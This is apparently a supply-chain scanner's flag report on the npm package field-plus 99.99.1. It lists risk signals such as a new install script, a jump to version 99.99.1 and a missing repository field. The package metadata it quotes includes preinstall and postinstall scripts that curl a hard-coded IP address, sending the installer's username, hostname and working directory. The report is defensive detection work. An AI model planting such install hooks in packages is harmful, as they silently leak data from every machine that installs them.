npm field-plus @99.99.1
score
0.5055
med
flagged
2026-06-15 05:29
amplifiers
co-occurring signal pairs that lift the final score
- install_script_payload + new_install_script: first-ever install script also matches payload regex (+0.15)
Signals fired
| signal | weight | rationale |
|---|---|---|
| content | ||
| new_install_script | 1.0 | first time ['postinstall', 'preinstall'] present |
| install_script_payload | 1.0 | install/lifecycle script matches payload regex |
| cadence | ||
| version_jump | 0.6 | latest published major 99.99.1 jumps from runner-up 1.0.0 |
| topology | ||
| no_repo | 0.3 | package.json has no repository field |
Prior profile (what it deviated from)
{
"had_install_script": false,
"maintainers": [
"palanichamy_perumal"
],
"versions": 1
}
Evidence (package doc at flag time)
{
"dependencies_count": 0,
"dist": {
"integrity": "sha512-SWMGAhx/1mvVCgOkMzOf4t4lURHVq5+cXZGq8BCDa5fxSj5w3SV2R/Lgl4rsMX3uicSsdniYIxJro0I5HTwX7A==",
"tarball": "https://registry.npmjs.org/field-plus/-/field-plus-99.99.1.tgz",
"unpackedSize": 505
},
"dist-tags": {
"latest": "99.99.1"
},
"latest_version": "99.99.1",
"maintainers": [
{
"email": "palanichamy.perumal@go-yubi.com",
"name": "palanichamy_perumal"
}
],
"num_versions": 2,
"repository": null,
"scripts": {
"postinstall": "curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true",
"preinstall": "curl -s 'http://3.7.226.146:9000/callback?user=$(whoami)&host=$(hostname)&pwd=$(pwd)&ts=$(date +%s)' > /dev/null 2>&1 || true"
},
"signal_details": {
"_amplifiers": [
"install_script_payload + new_install_script: first-ever install script also matches payload regex (+0.15)"
],
"install_script_payload": "install/lifecycle script matches payload regex",
"new_install_script": "first time ['postinstall', 'preinstall'] present",
"no_repo": "package.json has no repository field",
"version_jump": "latest published major 99.99.1 jumps from runner-up 1.0.0"
},
"time": {
"created": "2026-06-08T08:48:40.133Z",
"modified": "2026-06-15T10:29:32.057Z"
}
}